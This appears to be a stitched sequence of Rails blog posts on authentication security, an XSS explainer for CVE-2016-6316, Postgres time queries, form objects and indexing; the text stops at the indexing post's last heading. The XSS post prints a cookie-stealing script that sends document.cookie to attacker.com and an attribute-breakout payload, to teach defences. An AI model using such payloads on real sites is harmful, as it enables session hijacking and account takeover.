4 Ways to Secure Your Authentication System in Rails

Authentication frameworks in Ruby on Rails can be somewhat of a contentious topic. Take Devise, one of the more popular options, for example. Critics of Devise point out, perhaps rightly so, that there is a lack of clear documentation, that it is hard to understand, hard to customize and wonder if we wouldn’t be better off using a different gem or even rolling our own custom authentication system. Advocates of Devise, on the other hand, point out that Devise is the result of years of expert hard work and that by rolling your own, you’d forego much of the security that comes with using a highly audited piece of software. If you’re new to this conversation, you might ask yourself why you would even need Devise if, like in the Hartl Rails tutorial or the RailsCast on implementing an authentication system from scratch, you can just use has_secure_password and expire your password reset tokens (generated with SecureRandom) within a short enough time-period.

Is there something inherently insecure in the authentication systems described in the Hartl tutorial and the RailsCasts? Should a gem like Devise be used whenever your app needs to authenticate its users? Does using a gem like Devise mean that your authentication is now forever secure?

Like in most areas of software, the answer is that it depends. Authentication does not exist in isolation from the rest of your app and infrastructure. This can mean that even if your authentication system is reasonably secure, weaknesses in other areas of your app can lead to your users being compromised. Conversely, you might be able to get away with less than optimum security in your authentication system if the rest of your app and infrastructure pick up the slack.

The only way you, an app developer, can answer these questions satisfactorily is to deepen your understanding of security and authentication in general. This will help you as you make the tradeoffs that will inevitably arise when you are building and/or securing your app.

Whether you want to use Devise (or a similar third party gem like Clearance) or roll your own auth, here are 4 specific ways you can make authentication in your app more secure. Though your mileage may vary, I hope at the very least one of them gives you something to think about.

Throttle Requests

The easiest thing an attacker can do to compromise your users is to guess their login credentials with a script. Users won’t always choose good passwords, so given enough time, an attacker’s script will likely be able to compromise a significant number of your users just by making a large number of guesses based on password lists.

You can make it hard for attackers to do this by restricting the type and number of requests that can be made to your app within a predefined time period. The gem rack-attack, for example, is a Rack middleware that gives you a convenient DSL with which you can block and throttle requests.

Let’s say you just implemented the Hartl tutorial and you now want to add some throttling, you might do something like this after installing rack-attack:

throttle('req/ip', :limit => 300, :period => 5.minutes) do |req|

The above piece of code tells Rack::Attack to limit any given IP to at most 300 total requests every 5 minute period. You’ll notice that since the block above receives a request object, we can technically throttle requests based on any arbitrary request parameter.

While this limits a single IP from making too many requests, attackers can get around this by using multiple IP’s to bruteforce a user’s account. To slow this type of attack down, you might consider throttling requests per account. For example:

throttle("logins/email", :limit => 5, :period => 20.seconds) do |req|
  if req.path == '/login' && req.post?
    req.params['email'].presence # this will return the email if present, and nil otherwise

If you’re using Devise, you also have the option to “lock” accounts if there are too many unsuccessful attempts to log in. You can also implement a lockout feature by hand. However, there is a flip side to locking and/or throttling on a per-account basis – attackers can now restrict access to arbitrary user accounts by forcing them to lock out, which is a form of a “Denial of Service” attack. In this case, there is no easy answer. When it comes to choosing security mechanisms for your app, you’ll have to decide how much and what type of risk you’re willing to take on. Here is an old StackExchange post that might be a good starting point for further research

A note about Rack::Attack and DDoS attacks: Before actually implementing a throttle, you’ll want to use Rack::Attack's “track” feature to get a better idea of what traffic looks like to your web server. This will help you make a more informed decision about throttling parameters. Aaron Suggs, the creator of Rack::Attack, says it is a complement to other server-level security measures like iptables, nginx limit_conn_zone and others.

DoS and DDoS attacks are vast topics in their own right so I’d encourage you to dig deeper if you’re interested. I’d also recommend looking into setting up a service like Cloudflare to help mitigate DDoS attacks.

Set up your security headers correctly

Even though you probably serve requests over HTTPS, you might be vulnerable to a particular type of Man in the Middle attack known as SSL Stripping. To illustrate, imagine you lived in Canada and bank with the Bank of Montreal. One day, you decide to email money to someone and type “bmo.com” into the address bar in Chrome. If you had dev tools open and on the “Network” tab, you’d notice that the first request to bmo.com is made via http, instead of https. A suitably situated attacker could have intercepted this request and begun to serve you a spoofed version of the BMO website (making you divulge login information and what not), and they’d have been able to do this only because your browser used http, instead of https.

The Strict-Transport-Security header is meant to prevent this type of attack. By including the Strict-Transport-Security header (aka the HTTP Strict Transport Security or HSTS header) in its response, a server can tell a browser to only communicate with it via https. The HSTS header usually specifies a max-age parameter and the browser equates the value of this parameter to how long it should use https to communicate with the server. So, if max-age was set to 31536000, which means one year, the browser would only communicate with the server via https for a year. The HSTS header also lets your server specify if it wants the browser to talk via https on its subdomains as well. See here & here for further reading.

To make this happen in Rails, do config.force_ssl = true. This will ensure that the HSTS header is set to a value of 180.days. To apply https to all your subdomains, you can do config.ssl_options = {hsts: {subdomains: true}}.

The loophole in this is that the first ever request to the server might still be made via http. The HSTS header protects all requests except the first one. There is a way to have the browser always use https for your site, even before the user has actually visited, and that is by submitting your domain to be included in the Chromium preload list. The “disadvantage” with the preload approach is that you will never ever be able to serve info via http on your domain.

Having HSTS enabled doesn’t mean your users will be absolutely safe, but I’d wager they’d be considerably safer with it than without.

If you’re curious, you can quickly check what security related headers (of which HSTS is one) your server responds with on securityheaders.io. I advise looking into all the headers here to learn and decide if they apply to your situation or not.

Read authentication libraries (Devise, Authlogic, Clearance, Rodauth and anything else you have access to)

This especially applies if you’re rolling your own, but even if you don’t you can learn a lot from how another gem does a similar thing. You don’t always have to read the source code itself to learn. The change logs and update blog posts from maintainers can be just as informative, because they often go into detail about vulnerabilities that were discovered and the steps taken to mitigate them. Here are three things I learned from Rodauth and Devise that you might find intriguing:

Restricted Password Hash Access (Rodauth)

Unlike Devise and most “roll your own auth” examples, Rodauth uses a completely separate table to store password hashes, and this table is not accessible to the rest of the application. Rodauth does this by setting up two database accounts, app and ph. Password hashes are stored in a table that only ph has access to, and app is given access to a database function that uses ph to check if a password hash matches a given account. This way, even if an SQL injection vulnerability exists in your app, an attacker will not be able to directly access your users’ password hashes.

User Specific Tokens (Rodauth)

Rodauth not only stores password reset and other sensitive tokens in separate tables, it also prepends every token with an account ID. Imagine your forgot password link looked something like ‘www.example.com/reset_password?reset_password_token=abcd1234’ and an attacker was trying to guess a valid token. The attacker’s guess could potentially be a valid token for any user. If we prepend the token with an account ID (maybe the token looks like reset_password_token=<account_id>-abcd1234), then the attacker can only attempt to brute force their way in to one user account at a time.

Digesting Tokens (Devise)

Devise, since version 3.1 came out a few years ago, digests password reset, confirmation and unlock tokens before storing them in the database. It does so by first generating a token with SecureRandom and then digesting it with the OpenSSL::HMAC.hexdigest method. In addition to protecting the tokens from being read in the event that an attacker is able to access the database, digesting tokens in this manner also protects them against timing attacks since it would be near impossible for an attacker to control the string being compared enough to make byte-by-byte changes.

If you want to know more about Rodauth, check out their github page and also watch this talk by Jeremy Evans, its creator.

To summarize, the more you know about how other popular authentication frameworks approach authentication and the steps they take to avoid being vulnerable to attack, the more confident you can be in assessing the security of your own authentication set up.

Secure the Rest of Your App

Authentication does not stand in isolation. Vulnerabilities in the rest of your app have the potential to bypass any security measures you might have built into your authentication system.

Let’s consider a Rails app with a Cross Site Scripting (XSS) vulnerability to illustrate. Imagine the XSS vulnerability exists because there’s an html_safe in the codebase somewhere that unfortunately takes in a user input. Now, because our app is a Rails (4+) app, we have the httpOnly flag set on our cookie by default, which means any Javascript an attacker is able to inject won’t have access to document.cookie. Though it might seem like our app is safe from session highjacking attacks, our attacker can still do a bunch of things that compromise a user’s session. For example, they can inject Javascript that makes an AJAX request to change the user’s password. If the password change form requires the current password, they can try to change the user’s email (to their own) and initiate a password reset flow.

In short, an XSS vulnerability sort of makes it irrelevant how secure your authentication is, and the same can be said of other vulnerabilities like Path Traversal or CSRF.

Learning about security vulnerabilities and then applying that knowledge to attack your own app is a great way to, over the long term, write more secure code. I’d also encourage you to read through resources like the Rails Security Guide and security checklists like this and this.


Shameless Plug: If you’re within a few hours flight from Toronto, I’d love to come talk to you and your team about security, free of charge. Get in touch with me at sidk(AT)ducktypelabs(DOT)com for more info.

The above list is not meant to to be comprehensive, and what I’ve left out can probably fill multiple books. However, I hope I’ve given you a few things to think about and that you’re able to take away at least one thing that will make your app more secure.

I’d love to hear from you! Post in the comments section below – what do you do to secure your auth?

Do I really need to patch my Rails apps? (Understanding CVE-2016-6316)

Ruby and Rails security advisories, without exception, recommend that you upgrade your Rails app as soon as possible. Unfortunately, the descriptions of the problem being solved can be cryptic, and it can be hard to assess if you really need to do the upgrade. If you’re strapped for time, it can seem like a good plan to postpone upgrades and avoid extra work like fixing breaking tests.

Note: By “upgrade” in this article, we mean a ‘minor’ or a ‘patch’ upgrade. For example an upgrade from Rails to

In this article, we’re going to look at Rails, which fixes CVE-2016-6316. The aims of this article are:

  1. To go over the basics of XSS vulnerabilities, how they can be exploited, and ways to mitigate them.
  2. To increase your understanding about the specific problem being solved with the Rails release which fixes CVE-2016-6316 – an XSS vulnerability in ActionView and,
  3. Help you come to a conclusion on whether you should upgrade or not

What is an XSS Vulnerability?

“XSS” stands for cross-site scripting. When your application has an XSS vulnerability, attackers can run malicious Javascript on your users’ browsers. For example, consider a Javascript snippet like the following:

var i = new Image;
i.src = "http://attacker.com/" + document.cookie;

The above snippet, when run on a user’s browser, will cause the browser to make a request to attacker.com and send over the user’s cookie. Using this cookie, the attacker can proceed to hijack the user’s session and gain unauthorized access to secured areas of your app.

Types of XSS Vulnerabilities

There are three major varieties of XSS:

Reflected XSS

A reflected XSS vulnerability arises when user input contained in a request is immediately reflected in the web application’s response. Exploiting a reflected XSS vulnerability involves crafting a request containing embedded Javascript that is reflected to any user who makes the request.

Stored XSS

A Stored XSS vulnerability arises when data submitted by one user (the attacker) is stored in the application and is then displayed to other users without being sanitized properly.

DOM-based XSS

DOM-based XSS vulnerabilities arise when client-side Javascript extracts data contained in a request’s URL or the response’s HTML (accessible via the DOM) to dynamically update the page’s contents. Exploiting a DOM-based XSS vulnerability involves crafting a request URL containing embedded Javascript such that the client-side Javascript injects the malicious Javascript into the DOM and causes its execution.

Read this OWASP page for more info on the three types of XSS

For the purposes of this article, we will focus on Stored XSS.

How to attack a Stored XSS Vulnerability?

Let’s consider an example to illustrate how such a vulnerability can arise and how an attacker can take advantage of it.

A Vulnerable Rails app

Consider a typical Rails app, with users and admins. A user record has three fields – name, email and introduction. Each user has a profile page where this information is listed. Admins in the system, in addition to being able to access these profile pages, also have access to a /users page which consolidates all the users’ information. The view code for this page starts out looking something like this:

<% #This is accessible only to admins %>
<% User.all.each do |user| %>
  <%= user.name %>
  <%= user.email %>
  <%= user.introduction %>
<% end %>

Now let’s say we want to give our users the ability to customize their introductions with HTML. So instead of typing in "I'm awesome!!" in the introduction field, they can type in "I'm <strong>awesome!!</strong>". To accomplish this in our view, we make use of the html_safe helper and change user.introduction to user.introduction.html_safe. Now, if a user submits text with HTML in it, our view will render the HTML.

Enter Attacker

An attacker can take advantage of this HTML rendering and submit something like this in the introduction field:

I am awesome!!
  var i = new Image;
  i.src = "http://attacker.com/" + document.cookie;

and have this stored in the database. Now, whenever an admin logs in and visits the /users page, the above script will run and the attacker will see the admin’s cookie in their server logs. Using this cookie, they can proceed to log in as the admin and further their agenda (malicious though it may be).

Another way to introduce XSS vulnerabilities with html_safe

The above example illustrates one straightforward way by which an XSS vulnerability can be introduced with html_safe. That is, using html_safe directly on user inputs because we want to give users the ability to customize how their input renders.

Another way using html_safe can cause XSS vulnerabilities to sneak up on you is when you find yourself needing to incorporate styling on strings which are derived from user input. Going back to our example Rails app’s /users page, let’s say we’ve installed Font Awesome and we want to provide admins a nicely styled link to a given user’s profile page. We might do something like this in our view:

<% User.all.each do |user| %>
  <%= link_to "<i class='fa fa-user'></i> #{user.name}".html_safe, users_profile_path(user) %>
  <%= user.email %>
  <%= user.introduction %>
<% end %>

As in the previous example, this opens our admin’s account up to XSS attacks. By submitting javascript in the name field, an attacker can proceed to gain access to the admin’s account.

But I need to use html_safe. How can I protect my app?

The key is to use html_safe only on trusted strings, because it is an assertion. You can concatenate a string which is html_safe with a string which is not and be assured that the string which is not html_safe will be escaped properly. So for example, we can do:

<%= link_to "<i class='fa fa-user'></i> ".html_safe + "#{user.name}", users_profile_path(user) %>

which will ensure that user.name is properly escaped. So if we pass in a string like "Bob Foo<script>alert(document.cookie)</script> to name, our HTML will look something like:

<a href='...'><i class='fa fa-user'></i> Bob Foo&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a>

instead of:

<a href='...'><i class='fa fa-user'></i> Bob Foo <script>alert(document.cookie)</script></a>

which will prevent the Javascript from running.

The sanitize helper is another useful option. With sanitize, you can specify exactly what HTML tags and attributes you want to render and have it automatically reject anything else.

Rails Views have XSS Protections

Rails (from version 3 onwards), by default, will escape any content in your views unless you specify that they are html_safe (either directly by calling html_safe on a string or indirectly with sanitize). ActionView helpers like content_tag or link_to also will, by default, escape strings that are passed in to them.


As it turns out, inserting <script> tags into places where they won’t be escaped is just one of the many ways to exploit an XSS vulnerability. You (or an attacker) can also take advantage of the fact that Javascript can be called directly via HTML attributes such as onclick, onmouseover and others.

Let’s take a brief look at content_tag to examine how this can work in practice. Rails provides the content_tag helper to programmatically generate HTML tags. For example, to generate a div tag, you’d do something like this:

content_tag(:div, "hi")

which in HTML would translate to:


You can pass in additional parameters to content_tag to specify tag attributes. So if we wanted to add a title attribute, we could say something like:

content_tag(:div, "hi", title: "greeting")

which in HTML would translate to:

<div title="greeting">hi</div>

Now, let’s say for some reason, our app has this title attribute tied to a user input. Meaning, if our user input is foo, the HTML generated by content_tag would be:

<div title="foo">hi</div>

Assuming that there is no XSS protection enabled on content_tag, how would we exploit this?

We could send in a string like "onmouseover="alert(document.cookie), which would result in HTML like the following:

<div title="" onmouseover="alert(document.cookie)">

The key character in our example input is the first double-quote character ". This double-quote, because it is not escaped, is treated by the browser as a closing quote and makes it so that the characters after the double-quote are treated as valid HTML.

Rails, by default, will escape double-quotes, even in helpers like content_tag. Where CVE-2016-6316 comes in though, is when we mark our inputs to helpers like content_tag as html_safe.

Let’s say we’re passing in user input from our controller to the view with the @user_input instance variable, and our call to content_tag looks like:

<%= content_tag(:div, 'hi', title: @user_input) %>

If an attacker tries to pass in a string like "onmouseover=..., Rails will automatically escape the double quotes and prevent the XSS attack.

However, prior to Rails, if for some reason we marked the user input as html_safe:

<%= content_tag(:div, 'hi', title: @user_input.html_safe) %>

then this would allow double-quotes to be rendered in the HTML without being escaped. Which, as we’ve seen allows an attacker to execute arbitrary Javascript.

The Rails patch ensures that even if you mark an attribute in a tag helper as html_safe, double quotes will be escaped.

So, should I upgrade?

The easy and correct answer is yes, you should upgrade. Especially if the upgrades involve security patches. Even if the upgrades don’t involve security patches, you should upgrade so that future security patches are easier to apply.

That being said, I think it depends on how far away your version of Rails is from the most recently released patch. The closer you are, the easier the upgrade process will be. Security patches in general are designed not to cause breaking changes in your codebase, but that applies only if you’re at the most recent patch already.

If you’re strapped for time, it would behoove you to understand the problems that security advisories and related patches fix, so you can assess for yourself if your codebase is at risk and apply any mitigations necessary.


The most important thing you can do is to keep yourself aware of security advisories as and when they are released, and patch your app ASAP. Here’s how you can accomplish that:

Use bundler-audit. This somewhat automates the process of keeping an eye on security mailing lists, but the onus is on you to regularly run this gem and keep it updated (with bundle-audit update). If you use CI, a good step would be to integrate running bundle-audit as part of your CI process.

When bundler-audit flags a gem as being out of date, upgrade the gem either with bundle update <gem-name> or if you have to, manually changing the version in Gemfile.lock.

If you have the time, look into the security advisory that you just patched and use that as an excuse to learn more about that particular class of vulnerabilities.

Have you patched your Rails app recently? If so, how did that process go for you? What would you like to learn about security in Rails? Let me know in the comments below!

Shout-out: Thanks to Chris Drane for suggesting this article, and to Gabriel Williams at Cloud City for reviewing it!

3 ways to work with time in Postgres (& ActiveRecord)

Let’s say you’re developing a project management app with users and projects and the product manager asks you:

  1. How much time does it take a given user to create their first project?
  2. Give me a list of users who took longer than 1 month to create their first project.
  3. What is the average amount of time that it takes for a user to create their first project?
  4. What is the average amount of time per user between project creation?

You could approach solving the problems above purely in Ruby and ActiveRecord. However the data we want to work with resides in a database. The database is smart, capable & fast; with SQL, we can make the database retrieve arbitrary rows and perform complex calculations. It therefore stands to reason that making the database “do the work” as much as possible before sending information to Ruby-land will net us performance gains.

In this article, we’re going to explore how we can solve the above problems in Rails using SQL and a bit of ActiveRecord. The SQL used in this article applies only to Postgres(version 9.4.1), though the ideas in general can be translated to other database management systems.

First, a brief primer on SELECT

A SELECT statement retrieves zero or more rows from one or more database tables or database views.

So something like:


will retrieve all available rows from the users table.

You can also pass in “aggregator” functions like MIN(), COUNT(), MEAN() etc to SELECT. When these functions are passed in to SELECT, the return value is a single piece of data (an integer, string, timestamp etc).

So for example this:

SELECT MIN(created_at) FROM users

will return the earliest created_at (which is a timestamp) in the users table.

SELECT functions can also be nested within themselves, as we’ll see soon enough.

In ActiveRecord the select method can be used to achieve the same result. Also, calls to methods such as .all, .where, .find etc translate to SELECT functions.

I’ve prepared a handy 3-page PDF cheatsheet containing the salient points of this article. If you’d prefer downloading and printing it out, fill in your email address below and I’ll send it to you.

Download a 3-page Cheatsheet for working with time in Postgres

For the sake of this article, assume our models look like this:

class User < ActiveRecord::Base
  has_many :projects

class Project < ActiveRecord::Base
  belongs_to :user

Arithmetic operators (-, +, * and /)

The first problem we have to tackle is figuring out how much time it takes a user to create their first project. This time equates to the difference between the user’s earliest Project#created_at and User#created_at.

In Postgres, we can use the arithmetic difference operator - to calculate the difference between two timestamps or dates. The data type matters – if we calculate the difference between two timestamps, the return value is an “interval”, and if we calculate the difference between two dates, the return value is an integer representing the number of days between the two dates.

To make it easy to display the data, we’ll plan to use the select method with something like:

users = User.select('users.email, (projects.created_at - users.created_at) as time_to_first_project')

This will return an ActiveRecord::Relation which we can then iterate over and call #time_to_first_project on:

<% users.each do |user| %>
  <%= user.email %>
  <%= user.time_to_first_project %>
<% end %>

However, the above select won’t work for us for two reasons. First, ActiveRecord will complain that there is no FROM clause for the projects table. We can solve this with a call to joins:

User.joins(:projects).select('users.email, (projects.created_at - users.created_at)....')

Second, the above statement compares the creation times of all of a given users’ projects to User#created_at. We only care about the earliest project, so we can narrow this down with a call to where:

    .where('projects.created_at = (SELECT MIN(projects.created_at) FROM projects WHERE projects.user_id = users.id)')
    .select("users.email, (projects.created_at - users.created_at) as time_to_first_project")

Because a user’s earliest project’s created_at varies with the user, we retrieve this timestamp by passing in the aggregator function MIN() to a nested SELECT function (nested in this case within the first select). This nested SELECT function is also known as a “sub-query”.

This will return a collection of ActiveRecord objects with the attributes email and time_to_first_project. Because we’re subtracting two timestamps, time_to_first_project will be an “interval”.

Intervals in Postgres are the largest datatype available for storing time and consequently contain a lot of detail. If you inspect time_to_first_project for a few records, you’ll notice that they look something like: "00:18:43.082321" or "9 days 12:48:48.220725", which means you might have to do a bit of parsing and/or decorating before you present the information to the user.

Postgres also makes available the AGE(..) function, to which you can pass in 2 timestamps and get an interval. If you pass in one timestamp to AGE(), you’ll get back the difference between the current date (at midnight) and the passed-in timestamp.

If you have two timestamps and you want find the number of days between them, then you can use the CAST function to take advantage of the fact that when you subtract two dates you get the days between them. We’ll come back to CAST in a little bit.

Comparison and Filtering

Next, we want a list of users who took longer than 1 month to create a project. Ideally, we’d want to be able to get a list of users who took longer than any arbitrary period of time to create a project. This operation boils down to a ‘greater-than’ comparison between time_to_first_project and the time period we pass in (1 month for example). Postgres supports the comparison of dates and times to each other. In this case, since time_to_first_project is an interval, we have to make sure that we compare it to an interval in our call to where. This means that if we do:

users.where("(projects.created_at - users.created_at) > 30")

Postgres will complain that the operator to compare an interval and integer doesn’t exist. To get around this, we have to ensure that the right hand side of the comparison is an interval. We do this with the INTERVAL type keyword. We’d use it in this way:

    .where('projects.created_at = (SELECT MIN(projects.created_at) FROM projects WHERE projects.user_id = users.id)')
    .where("(projects.created_at - users.created_at) > INTERVAL '1 month'")

As you can see, we can pass in a human readable string like “1 month” to INTERVAL, which is nice.


Next on the list, we want to calculate the average amount of time it takes to create a project. Given what know so far, this won’t require much explanation. Our query will look like this:

    .where('projects.created_at = (SELECT MIN(projects.created_at) FROM projects WHERE projects.user_id = users.id)')
    .select("AVG(projects.created_at - users.created_at) as average_time_to_first_project")

We’re using the AVG() function and our query will return one User object on which we can call average_time_to_first_project.

ActiveRecord also has available the average function, which we can call like this:

    .average('projects.created_at - users.created_at)

This query’s return value will be a BigDecimal, and because of this we might lose some information. For example, if the true average is INTERVAL "1 day 23:00:01.2234", the BigDecimal value will be 1.

Finally, what if we want to calculate the average time between project creation for each user?

The average time between projects for a user is the average of the difference between consecutive Project#created_at values. So for example, if there are three projects, the average time between projects is:

"((project3#created_at - project2#created_at) + (project2#created_at - project1#created_at))/2"

This is equal to (project3#created_at - project1#created_at) / 2. For N projects, the average time between projects is:

"(projectN#created_at - project1#created_at) / (N - 1)"

In our example, “projectN” corresponds to the user’s latest project and therefore its creation date is equal to MAX(projects.created_at). Similarly, the user’s earlier project creation date corresponds to MIN(projects.created_at). The number of projects is calculated with COUNT(projects).

For our output, let’s say we want the average time between projects to be reported in number of days. Since subtracting two dates in Postgres returns an integer number of days, we can obtain the average time between projects in days by first casting MAX(projects.created_at) and MIN(projects.created_at) to dates, subtracting them and then dividing by COUNT(projects) - 1. In Postgres, we can cast our timestamps with the CAST function. For example:

CAST(MIN(projects.created_at) as date)

will convert the created_at timestamp to a date.

Finally, we want this calculation to be performed once for every user. For this, we have to use the group method, which corresponds to the GROUP BY clause. We need this clause because if we didn’t have it, the calculation will be performed only once for the entire set of projects, rather than for every user.

Our query will look like this:

    .having('COUNT(projects) > 1')
    .select("(CAST(MAX(projects.created_at) as date) - CAST(MIN(projects.created_at) as date))/(COUNT(projects) - 1) as avg_time_between_projects, users.email as email")

You’ll also notice that I’ve included a call to .having('COUNT(projects) > 1'). This ensures that only users who have more than one project are considered.

Where should we put this stuff in our codebase?

In the database

It can be beneficial to have this SQL reside in the DB instead of in your application layer. You can make this happen with views. A “view” is a stored query which we can query just as we would a table. As far as ActiveRecord is concerned, there is no difference between a view and a table.

The idea is that by creating a view with the user’s email and the fields we’re interested in, like average time between projects and time taken to create the first project, our application code will be cleaner because we can now say something like UserReport.where('average_time_between_projects > ?', 30.days) instead of “all the SQLs”.

To create a view, first create a migration like so:

def change
  sql = <<-SQL
    CREATE VIEW user_reports AS
    SELECT (CAST(MAX(packages.created_at) as date) - CAST(MIN(packages.created_at) as date))/(COUNT(packages)-1) as time_between_projects, COUNT(packages) as count, users.email as email FROM \"users\" INNER JOIN \"packages\" ON \"packages\".\"user_id\" = \"users\".\"id\" WHERE \"users\".\"role\" = 'client' GROUP BY users.email HAVING COUNT(packages) > 1    

The SQL I’ve used was generated by calling the to_sql method on the query we ran previously. Run the migration and then create a UserReport model class which inherits from ActiveRecord::Base. You should now be able do things like UserReport.average('time_between_projects'). You might also notice that results come back faster.

There is one issue with this approach and that is that your schema file is not going to show this view. So if you want your CI to build correctly, you might have to change your schema option to generate sql instead. It’s pretty simple to do this with Rails. The other caveat is that this introduces a cost to switching to a different database backend, because the SQL we now have in our migration is Postgres-specific.

Here are some good resources on views:

  1. https://blog.pivotal.io/labs/labs/database-views-performance-rails
  2. http://blog.roberteshleman.com/2014/09/17/using-postgres-views-with-rails/
  3. The Scenic gem for views, which gets around the schema problem

In the application

If you don’t want to go the views route, you might consider organizing your queries with query objects and scopes. Have a look at this for a brief introduction to query objects.


With the information covered in this article, we can now begin to craft an answer for our hypothetical product manager, making the database server bear the brunt of the work. I’d now like to hear from you. Have you worked with time in ActiveRecord and your DB? If yes, how was the experience and what did you learn from it? Leave a comment below!

I’ve prepared a handy 3-page PDF cheatsheet containing the salient points of this article. If you’d prefer downloading and printing it out, fill in your email address below and I’ll send it to you.

Download a 3-page Cheatsheet for working with time in Postgres

How To Keep Your Controllers Thin with Form Objects

Typically in Rails, forms which post data to a #create or #update action are concerned with one particular resource. For example, a form to update a user’s profile. The sequence looks something like this:

  1. The form submits some data to the #create action in UsersController.
  2. The #create action, with something like User.create(params) creates the record in the User table.

This is easy to reason about. We have one form to create one user. It submits user data to a users controller, which then creates a record in the User table with a call to the User model.

Though some percentage of the forms in our app can be described this simply, most forms we find ourselves needing to build are not that simple. They might need to save multiple records, or update more than one table, and/or perform some additional processing (like sending an email). There might even be more than one context under which a record can be updated (for example a multi-step application form).

Trying to stuff a bunch of logic in your controller can turn out to be quite painful in the long run, as they become longer and harder to understand. Moreover, you might find yourself having to perform gymnastics with your views to get them to pass in parameters correctly.

For example, imagine you’re building a form for a project management app. This form creates a user like in our first example, but in addition, has to do a few other things. First, it has to create a record in the Message table. Then it has to create a record in the Task table. Finally it has to send an email to the project manager.

Some definitions and assumptions before we go forward:

  1. The Message table is used for internal messaging amongst various members of the project.
  2. The Task table is used to store and manage tasks assigned to members of the project.
  3. When a new user is created, we want to send an internal message and assign a new task to the project manager.
  4. We also want to send an email notification to the project manager when a new user is created.

Compared to the first example, it’s obvious that this form requires a flow that doesn’t quite as neatly fit in to the conventional form flow that we saw earlier. There are a few ways we can handle this:

  1. Add in the code to UsersController to accomplish the extra stuff.
  2. If your models are associated with each other (via has_many or belongs_to), build a nested form using either Rails’ built-in fields_for helper, or Ryan Bates’ nested_form gem. You’ll still have to send the email in the controller.
  3. Create a new controller and corresponding “form object” that encapsulates what you want to do.

What is a Form Object

A form object is a Plain Old Ruby Object (PORO). It takes over from the controller wherever it needs to talk to the database and other parts of your app like mailers, service objects and so on. A form object typically functions together with a dedicated controller and a view.

Why use a Form Object

Now, while there are good reasons to go with either option 1 or 2, I’m going to elaborate on option 3. There are a few benefits to using a form object in a situation like this:

  1. Your app will be easy to change.

    If your app is a decent sized web-app, you will likely have a multitude of paths and views through which data gets saved and/or retrieved from your Users table. It’s worth thinking about if UsersController or the User model should be where these paths meet, because if you’re not careful your controller can devolve into a mess of hard-to-change conditional code.

  2. Your app will be easy to reason about

    Conventionally in Rails, the simplest way to reason about a controller is to have it concerned with the seven RESTful actions and views; these actions would only interact with one model and ideally the interaction would be a one-liner like @user.update(params). The closer your controller is to this pattern, the easier your controller will be to reason about.

  3. Your view will likely be simpler to write (read: no deeply nested forms) and contain less logic.

What a Form Object looks like in practice

First things first, decide on the name of your new controller. This will give you quick feedback on if your abstractions will make things easier to reason about.

I always ask myself this, what happens when the form is submitted? In our example above, a user is created and the rest of the project team is notified. So a reasonable name might be ‘UserRegistrationsController`. You can double check by trying to apply the seven RESTful actions to this controller:

  • Can I “create” a user_registration?
  • Can I “update” a user_registration?
  • Can I “destroy” a user_registration?
  • … and so on

All seven actions might not always make sense, which is why I find it handy to define my routes like this, for example:

resource :user_registrations, only: [:create, :update, :new, :edit] 

In my Rails apps, the convention I follow is to always name the form object class FormObject, and namespace them with something context dependent. So in this case, my form object would be UserRegistration::FormObject.

So your form, which resides at user_registrations/new.html.erb, posts some data to the #create action of the UserRegistrationsController, which calls #save on UserRegistration::FormObject with the params you pass in.

Form Object parameters

To be able to specify an input in your form, you need to expose the related attribute in your form object. In our example, one of the inputs we want is the user’s name. So in our form object, we’d do:

module UserRegistration
  class FormObject
    include ActiveModel::Model
    attr_accessor :name
    def self.model_name
      ActiveModel::Name.new(self, nil, 'UserRegistration')

Because we’ve said attr_accessor :name, we can now in our view say something like <%= f.text_field :name %>.

You’ll also notice a couple of other things:

  1. We said include ActiveModel::Model. This is cool, because we can now use methods like validates and perform any validations we want. An advantage of using validations in the form object is that they are specific to the form object and won’t clutter up your model(s).

  2. We also defined the model_name class method. The Rails form builder methods (form_for and the rest) need this to be defined.

Form Object Initialize and Save

The behavior of our form object will be governed by two methods. #initialize and #save. This is because in our controller, we want to be able define our create action like so:

def create
  @form_object = UserRegistration::FormObject.new(params)
  if @form_object.save
    ... #typically we flash and redirect here
    render :new

You can see above how the form object directly replaces the model, allowing us to keep our controller clean and short.

Your initialize method would look something like:

def initialize(params)
  self.name = params.fetch(:name, '')
  ... # and so on and so forth

And save:

def save
  return false unless valid? #valid? comes from ActiveModel::Model
  User.create(name: name)


def notify_project_manager
  ... # here we talk to the Message model

def assign_task_to_project_manager
  ... # here we talk to the Task model
# and so on and so forth

The important thing with the #save method is to return false and true correctly depending on if the form submission meets your criteria, so that your controller can make the right decision.


I’m a big fan of form objects, and a general rule of thumb for me is to use them whenever I feel things are getting complicated in the controller and view. They can even be used in situations where you’re not dealing directly with the database (like for example interacting with a third party API).

I encourage you, if you haven’t already, to consider how form objects might fit into your app. They will go a long way in ensuring your controllers and models are thin and keeping your code maintainable.

Have you used form objects in your Rails apps? Have they helped or hindered you? How else do you keep your controllers thin? Let me know in the comments section, I’d love to hear what you think.

When is indexing in a model appropriate?

A user on Reddit says:

I’m not a DB ninja like a lot of developers as I started out more front end and moved towards full stack. I understand the point of indexing is to speed up SQL queries on large data sets, but I feel like I’m just not sure when to use them and when not to.

What is the current best practice with rails?

Uncertainty often stems from a lack of understanding, and indexes in your Rails app can, if you’re not familiar with them, be akin to those murky backwaters you rarely venture into. But it needn’t be. Indexing done right can make a huge difference to the performance and speed of your app, which more often than not, will translate into increased sales, conversions or whatever it is you measure to determine if your app’s ultimate purpose is being fulfilled.

What is an index?

An index is a database construct that makes it easier for the database to look up a given piece of information. An oft cited example, which brings the point home, is that of a phone book index. Imagine you wanted to look up one Rick Sanchez’s phone number – what would be faster? Looking through each page of the book one by one, or flipping back to the index which conveniently lists in alphabetical order the page number Rick’s phone number might be found in? Of course, the index would be way faster. And the positive performance effects multiply the more times you have to look up phone numbers.

Now, when someone moves in or out of Rick’s locality (which the phone book covers), or someone’s name or phone number changes, the index at the back will also have to be updated. This might end up costing you performance if you’re not careful.

Why use an index?

If we represented the phone book example in database terms, we’d probably have a PhoneBook table, with a name and phone_number column. Adding an index to the table on the name column, makes it easier and faster for the database to look up a phone number for a given name (say when you do something like PhoneBook.where(name: 'Morty Smith') ), especially if there are a large number of rows to look through.

So the main reason to use an index on a given column is increased speed, which will more often than not, translate into more sales, conversions or whatever it is you measure to determine if your app’s ultimate purpose is being fulfilled.

Note that although we’re just talking about indexing on one column, it is actually possible to index on multiple columns too. I’ll list out resources at the end of this article which will go more in depth into topics like this.

When to use an index

